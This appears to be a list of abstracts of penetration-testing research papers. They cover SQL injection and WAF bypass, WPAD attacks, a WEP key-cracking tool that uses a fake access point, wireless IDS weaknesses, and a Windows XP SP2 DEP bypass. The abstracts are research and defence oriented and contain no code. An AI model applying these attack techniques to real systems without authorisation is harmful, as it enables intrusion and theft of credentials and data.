Many years’ assessment practice of the PT Research analytic center and the experience of the Positive Technologies company in penetration testing and information security auditing show that errors in web application protection still are among the most common information security shortcomings

In this paper, the quickest methods of Blind SQL Injection (error-based) exploitation are collected and considered by examples of several widespread databases.

According to Positive Technologies experts’ analysis, SQL Injection vulnerabilities are the most widespread server-side vulnerabilities in web applications. Their exploits have changed a lot and are much easier to use, so these vulnerabilities are widely used by attackers to automatically infect web applications with malicious code. In this article, the ways to use SQL Injection to compromise web application and/or a system as a whole, are examined in detail, including application security filter bypassing and Web Application Firewall (WAF). The article also includes the most actual exploitation methods of SQL Injection with recommendations how to protect your system.

The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2008. This initiative is a collaborative industry wide effort to pool together sanitized website vulnerability data and to gain a better understanding about the web application vulnerability landscape.

There is no doubt that WAFs are applied with desire to reduce the existing risks of the attacks that aim to exploit vulnerabilities in web-applications.
The developers of such filters promise that this is the simplest and the cheapest solution for “all problems.” At the same time, the administrators sincerely believe (for the umpteenth time) that their own systems are impregnable. However, it will be shown in the paper that WAF is not the long-expected “silver bullet.” As everything created by human, WAF has its weaknesses, which allows one to exploit vulnerabilities even in the most secure servers.

If we consider PCI DSS compliance management process in terms of vulnerability assessment and compliance management systems, it is possible to see a number of requirements which are directly or indirectly related to PCI DSS.

While reviewing the monthly updates from Microsoft, my attention was attracted by bulletin MS09-008, or more precisely, its part about WPAD. The bulletin fixes a number of vulnerabilities in Microsoft DNS and WINS services, including «WPAD Registration Vulnerability», but WPAD appears in security bulletin not for the first time. WPAD weaknesses were announced firstly in 1999, a wide range of problems closely associated with WPAD technology was published in 2007. In the same year Chris Paget showed WPAD vulnerabilities exploits at ShmooCon 2007. Now, 10 year later, Microsoft is publishing patches to fix WPAD flaws, but the question about security in networks, where WPAD is used, is still open. Successful attack on WPAD guarantees attackers full access on user data sent to Internet which could allow stealing critical data like passwords or credit card numbers. WPAD potential danger depends on two factors: default configuration and weak awareness among users.
In this article we discuss WPAD architecture and its many functioning principles in home and corporate networks, real examples of attacks and give recommendations for ordinary users and system administrators that allow reducing attack consequences.

The Web Application Security Consortium (WASC) is pleased to announce the WASC Web Application Security Statistics Project 2007. This initiative is a collaborative industry wide effort to pool together sanitized website vulnerability data and to gain a better understanding about the web application vulnerability landscape.

It is shown by MaxPatrol team that attacks to WiFi clients may allow to get WEP keys without interaction with access points. Wep0ff is new tool to crack WEP-key without access to AP by mount fake access point attack against WEP-based wireless clients. It uses combination of fragmentation and evil twin attacks to generate traffic which can be used for KoreK-style WEP-key recovery. This tool can be used to mount fake access point attack against WEP-based wireless clients.
This tool can be used to generate traffic with WEP-based wireless clients, who are seeking for AP. It waits while client connects to our 'fake' access point (AP), then intercepts either Gratuitous ARP (IPv4) or ICMPv6 Neighbor Solicitation (IPv6) packet, slightly modifies it and sends back. If target machine answers our packet, we start to send it in the endless loop.

Wireless intrusion detection systems (WIDS) are not yet as popular as their wired counterparts, but current trends would suggest that their number is set to grow. One positive factor in this respect is the integration of such programs with active network equipment and Management awareness of the risks associated with the unauthorised use of wireless devices. This awareness has led to an increase in the number of WIDS installations - even where wireless networks are not used.
In view of this situation, specialists in the field of security are now aware of the need to evaluate not only the quality features of any product, but also of the need to predict any possible negative influence arising from its implementation on the security of a corporate network.
This article looks at the results of research into wireless intrusion detection systems from the point of view of the specialist in the field of applications security. Design faults discovered are not discussed in the article as their correction requires significant effort on the part of the manufacturer.

In October 2004 it was discovered by MaxPatrol team that it is possible to defeat Microsoft® Windows® XP SP2 Heap protection and Data Execution Prevention mechanism. As a result it is possible to implement: 1) Arbitrary memory region write access (smaller or equal to 1016 bytes); 2) Arbitrary code execution; 3) DEP bypass.